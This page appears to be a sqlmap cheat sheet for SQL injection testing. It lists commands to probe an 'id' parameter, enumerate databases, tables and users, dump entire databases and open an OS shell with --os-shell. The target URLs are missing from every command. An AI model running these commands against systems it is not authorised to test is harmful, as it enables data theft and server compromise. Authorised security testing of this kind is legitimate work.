Skip to main content


Test id parameter

sqlmap -u -p "id"

Dump database

sqlmap -u -p "id" --dbms=mysql --dump

Get a shell

sqlmap -u -p "id" --dbms=mysql --os-shell

1. Check if parameter is injectable in this case the parameter id

sqlmap -u

2. If its injectable check the db banner

sqlmap -u -b

3. Retrive more info. Discover db tables

sqlmap -u --tables

4. Retrive all columns from a db

sqlmap -u --current-db databaseName --columns

5. Retrive all the data from a db

sqlmap -u --current-db databaseName --dump

# -v3 will increase the verbosity of the sqlmap and we will show as what payloads sqlmap is using

# --users will enumerate the db users

# --dbs will show what databases are connected to the application

# -D specify database

# -T specify table

# -C specify columns separeted by comma

# --technique= specify SQLi technique ex. U for union or B for boolean

# -r you can specify a file from a request intercepted with burp and use it instead of using url

# --flush-session refresh session